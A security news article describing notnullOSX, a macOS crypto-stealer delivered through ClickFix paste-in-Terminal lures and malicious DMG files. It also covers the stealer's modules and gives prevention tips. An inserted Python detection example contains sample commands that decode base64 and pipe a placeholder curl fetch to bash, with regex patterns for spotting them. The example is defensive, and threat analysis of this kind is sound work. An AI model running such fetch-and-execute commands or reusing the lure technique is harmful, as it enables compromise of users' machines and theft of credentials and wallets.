Hackers Exploit ClickFix and Malicious DMG Files to Deploy notnullOSX on macOS
A new macOS information-stealing malware, dubbed notnullOSX, has emerged, specifically targeting cryptocurrency holders with wallet balances exceeding $10,000. Crafted in the Go programming language, this malware employs dual attack vectors—ClickFix social engineering tactics and malicious DMG disk image files—to infiltrate Apple Mac systems stealthily. The operators behind notnullOSX meticulously select their victims through an affiliate panel before initiating an attack, ensuring a highly targeted approach.
Origins and Development
The genesis of notnullOSX traces back to 2022, attributed to a developer known as 0xFFF, who initially introduced a rudimentary macOS stealer on underground forums. Following a dramatic exit in 2023—allegedly due to a fabricated law enforcement tip orchestrated by a rival—0xFFF vanished, leaving subscribers without refunds. In August 2024, the same individual resurfaced under the alias alh1mik, issued an apology, and began accepting preorders for a new macOS stealer priced at $400 per month. By 2026, this offering had materialized into the sophisticated notnullOSX malware.
Targeted Deployment
Moonlock Lab researchers first detected notnullOSX on March 30, 2026, across regions including Vietnam, Taiwan, and Spain. Their analysis revealed the malware’s deliberate construction: before targeting an individual, operators must complete a submission form detailing the victim’s social media profiles, wallet address, and correspondence history. Notably, the malware enforces a minimum wallet threshold of $10,000, automatically rejecting submissions below this amount.
Infection Mechanisms
The infection process begins with a counterfeit "protected" Google document that displays a fake encryption error and prompts the victim to take one of two actions—both of which lead to malware installation:
1. ClickFix Technique: The victim is instructed to open the Terminal and paste a base64-encoded command, which discreetly retrieves and executes a remote bash installer script.
2. Malicious DMG File: The victim downloads a DMG disk image containing a README file, an install script, and a Terminal shortcut, all designed to appear routine.
In both scenarios, the victim unwittingly installs the malware without triggering any security warnings.
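Defender-side detection of the ClickFix step, as an added example that is not from the article or from Moonlock Lab: it scans recorded shell command lines (constructed sample telemetry, with a placeholder payload pointing at a reserved .invalid domain) for a base64 blob that is decoded on the spot and handed straight to a shell, and decodes the blob so an analyst can see what it would fetch.

```python
import base64
import re

# Constructed sample telemetry: command lines as a shell-history or EDR
# collector might record them. Not from the report; the payload is a
# placeholder built here, pointing at a reserved .invalid domain.
PAYLOAD_B64 = base64.b64encode(
    b"curl -fsSL https://example.invalid/install.sh | bash"
).decode()
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    f"echo {PAYLOAD_B64} | base64 -d | bash",
    "git status",
    f'bash -c "$(echo {PAYLOAD_B64} | base64 --decode)"',
    "base64 -d notes.b64 > notes.txt",   # decodes, but nothing executes it
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
DECODER = re.compile(r"base64\s+(-d|-D|--decode)\b|openssl\s+(base64|enc)\s+-d")
EXECUTOR = re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b|\beval\b|\$\(")
FETCH = re.compile(r"\b(curl|wget)\b")

def decode_tokens(cmd):
    """Return the printable decodings of every base64-looking token in cmd."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue            # not real base64, or binary: skip it
        if all(c.isprintable() or c.isspace() for c in text):
            out.append(text)
    return out

def analyze(cmd):
    """Flag the ClickFix shape: inline base64 decode + output fed to a shell.
    Reasons record what was matched, including what the blob decodes to."""
    reasons, decoded = [], decode_tokens(cmd)
    if DECODER.search(cmd):
        reasons.append("inline base64 decode")
    if EXECUTOR.search(cmd):
        reasons.append("output handed to a shell")
    for text in decoded:
        if FETCH.search(text):
            reasons.append(f"decoded payload fetches remote content: {text!r}")
        if EXECUTOR.search(text):
            reasons.append("decoded payload itself pipes to a shell")
    suspicious = {"inline base64 decode", "output handed to a shell"} <= set(reasons)
    return {"command": cmd, "suspicious": suspicious, "reasons": reasons, "decoded": decoded}

def scan(commands):
    """Return only the command lines that match the pattern."""
    return [r for r in map(analyze, commands) if r["suspicious"]]
```

A plain `base64 -d file > out` is deliberately not flagged, because the signal is decode-and-execute in one line, not the decoder alone.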
Distribution Tactics
The malware’s distribution network is notably sophisticated. A fraudulent product page for a wallpaper application named WallSpace was established at wallpapermacos[.]com, complete with polished screenshots and a free download button. Additionally, a hijacked YouTube channel, dormant since 2015, promoted the fake app through a single video that amassed 50,000 views within two weeks, indicative of paid promotion or search engine optimization manipulation.
Technical Exploitation
notnullOSX abuses macOS’s Transparency, Consent, and Control (TCC) framework rather than bypassing it: the victim is guided to grant the malware Full Disk Access manually in System Settings. That single permission covers every TCC-protected data category, so no further consent prompts appear. The malware operates through a modular architecture, downloading separate binaries from its command-and-control server to perform specific data theft tasks. Confirmed modules include:
– iMessageGrab: Extracts iMessage conversations.
– AppleNotesGrab: Retrieves content from Apple Notes.
– CryptoWalletsGrab: Targets cryptocurrency wallet information.
– BrowserGrab: Collects browser data, including cookies and history.
– TelegramGrab: Accesses Telegram messages and data.
– CredsGrab: Harvests stored credentials.
– ReplaceApp: Particularly concerning, this module silently replaces legitimate hardware wallet applications, such as Ledger Live, with trojanized versions, compromising the security of cryptocurrency transactions.
Implications and Recommendations
The emergence of notnullOSX underscores the evolving sophistication of cyber threats targeting macOS users, particularly those involved in cryptocurrency. The malware’s dual attack vectors and targeted approach highlight the necessity for heightened vigilance and robust security practices.
Preventive Measures:
– Verify Sources: Only download applications and documents from trusted, official sources.
– Exercise Caution with Terminal Commands: Never paste commands from unverified sources into Terminal or other system utilities, especially when a web page or document instructs you to do so to "fix" an error.
– Monitor Permissions: Regularly review and manage application permissions, particularly those requesting Full Disk Access.
– Stay Informed: Keep abreast of emerging threats and adapt security practices accordingly.
By implementing these measures, users can significantly reduce the risk of falling victim to sophisticated malware campaigns like notnullOSX.